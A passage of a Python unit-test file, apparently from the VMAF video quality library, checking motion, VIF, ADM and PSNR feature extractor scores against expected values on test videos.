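        # append individual assertAlmostEqual failures to it instead of aborting,
        # and tearDown fails the test run if the list is non-empty.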
def tearDown(self):
if hasattr(self, 'fextractor'):
            self.fextractor.remove_results()
self.assertEqual([], self.verificationErrors)
def test_run_float_motion_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': False}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['float_motion_feature_motion_score']
def test_run_float_motion_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_motion_feature_motion_score'], 4.0498253125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_motion_feature_motion_score'], 4.0498253125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_float_motion_fextractor_forcing_zero(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'motion_force_zero': True, 'debug': True},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['float_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[0]['float_motion_feature_motion_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['float_motion_feature_motion_force_0_score'], 0.0, places=8)
self.assertEqual(len(results[0]['float_motion_feature_motion2_force_0_scores']), 48)
self.assertEqual(len(results[1]['float_motion_feature_motion2_force_0_scores']), 48)
def test_run_integer_motion_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': False},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
with self.assertRaises(KeyError):
s = results[0]['integer_motion_feature_motion_score']
def test_run_integer_motion_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
self.assertAlmostEqual(results[0]['integer_motion_feature_motion_score'], 4.0498181041666665, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion_score'], 4.0498181041666665, places=8)
def test_run_integer_motion_fextractor_forcing_zero(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'motion_force_zero': True, 'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[0]['integer_motion_feature_motion_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion_force_0_score'], 0.0, places=8)
def test_run_integer_motion_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_score'], 2.8104533333333332, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_score'], 2.8104533333333332, places=8)
def test_run_float_vif_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_score'], 0.3634208125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_score'], 0.7666474166666667, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_score'], 0.8628533333333334, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_score'], 0.9159719583333334, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale0_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale1_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['float_VIF_feature_vif_num_score']
def test_run_float_vif_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_score'], 0.3634208125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_score'], 0.7666474166666667, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_score'], 0.8628533333333334, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_score'], 0.9159719583333334, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale0_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale1_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_score'], 0.44609339583333335, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_score'], 712650.1518554376, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_score'], 1597314.4783325624, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale0_score'], 468101.7565104167, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale0_score'], 1287822.3411458333, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale1_score'], 184971.52506510416, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale1_score'], 241255.05696614584, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale2_score'], 47588.75968416667, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale2_score'], 55149.814208979165, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_num_scale3_score'], 11988.110595750002, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_den_scale3_score'], 13087.266011562499, places=0)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 0.3636620625, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 0.7674953125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 0.8631078125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 0.9157200833333333, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale0_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale1_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['integer_VIF_feature_vif_num_score']
def test_run_integer_vif_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 0.3636620625, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 0.7674953125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 0.8631078125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 0.9157200833333333, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale0_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale1_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_score'], 0.44642331250000006, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_score'], 713111.410502125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_score'], 1597165.5464884583, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale0_score'], 468372.4192708333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale0_score'], 1287711.328125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale1_score'], 185125.40266927084, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale1_score'], 241188.595703125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale2_score'], 47606.0171713125, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale2_score'], 55153.50821933334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_num_scale3_score'], 12007.571390770832, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_den_scale3_score'], 13112.1144409375, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_score'], 0.4330893333333334, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_score'], 0.830613, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_score'], 0.9072123333333333, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_score'], 0.945896, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale0_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale1_score'], 1.0, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale2_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['integer_VIF_feature_vif_scale3_score'], 1.0, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_debug1_yuv422p10le(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_10bit_videos_for_testing()
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=True,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_scores'][-1], 0.416638, places=6)
def test_run_integer_vif_fextractor_debug2_160x90(self):
ref_path = VmafConfig.test_resource_path("yuv", "ref_test_0_1_src01_hrc00_576x324_576x324_vs_src01_hrc01_576x324_576x324_q_160x90.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "dis_test_0_1_src01_hrc00_576x324_576x324_vs_src01_hrc01_576x324_576x324_q_160x90.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 160, 'height': 90})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=True,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_scores'][31], 0.982747, places=6)
def test_run_integer_vif_fextractor_debug3_yuv420p10le(self):
ref_path = VmafConfig.test_resource_path("yuv", "sparks_ref_480x270.yuv42010le.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "sparks_dis_480x270.yuv42010le.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 480, 'height': 270,
'yuv_type': 'yuv420p10le'})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=True,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_scores'][0], 0.933186, places=6)
self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_scores'][2], 0.999348, places=6)
def test_run_float_adm_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_score'], 0.9345148541666667, places=4)
self.assertAlmostEqual(results[1]['float_ADM_feature_adm2_score'], 1.0, places=6)
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['float_ADM_feature_adm_num_score']
def test_run_float_adm_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_score'], 0.9345148541666667, places=4)
self.assertAlmostEqual(results[1]['float_ADM_feature_adm2_score'], 1.0, places=6)
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_score'], 0.9345148541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_score'], 371.80645372916666, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_score'], 397.83379106250004, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale0_score'], 45.526146958333335, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale0_score'], 50.14385129166667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale1_score'], 66.574236, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale1_score'], 74.47438383333333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale2_score'], 105.55483329166668, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale2_score'], 113.49725864583333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_num_scale3_score'], 154.15123754166666, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_ADM_feature_adm_den_scale3_score'], 159.7182974375, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_psnr_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerPsnrFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_y_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cb_score'], 38.4494410625, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cr_score'], 40.99191027083334, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_y_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cb_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cr_score'], 60.0, places=4)
def test_run_integer_psnr_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerPsnrFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_y_score'], 32.577818, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cb_score'], 39.044961, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cr_score'], 41.286965333333335, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_y_score'], 84.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cb_score'], 84.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cr_score'], 84.0, places=4)
def test_run_integer_psnr_fextractor_16bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_16bit_videos_for_testing()
self.fextractor = IntegerPsnrFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_y_score'], 32.579806000000005, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cb_score'], 39.04694966666667, places=4)
self.assertAlmostEqual(results[0]['integer_PSNR_feature_psnr_cr_score'], 41.288954, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_y_score'], 108.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cb_score'], 108.0, places=4)
self.assertAlmostEqual(results[1]['integer_PSNR_feature_psnr_cr_score'], 108.0, places=4)
def test_run_float_adm_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_score'], 1.116686, places=6)
def test_run_float_adm_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.0}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_egl_1_score'], 0.9574308606115118, places=6) #
def test_run_float_adm_fextractor_akiyo_multiply_enhn_gain_limit_1d2(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.2}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_ADM_feature_adm2_egl_1.2_score'], 1.116595, places=6)
def test_run_float_vif_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_score'], 1.0522544319369052, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_score'], 1.0705609423182443, places=5)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale2_score'], 1.0731529493098957, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale3_score'], 1.0728060231246508, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_float_vif_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = FloatVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.0},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale0_egl_1_score'], 0.983699512450884, places=4)
self.assertAlmostEqual(results[0]['float_VIF_feature_vif_scale1_egl_1_score'], 0.9974276726830457, places=4)
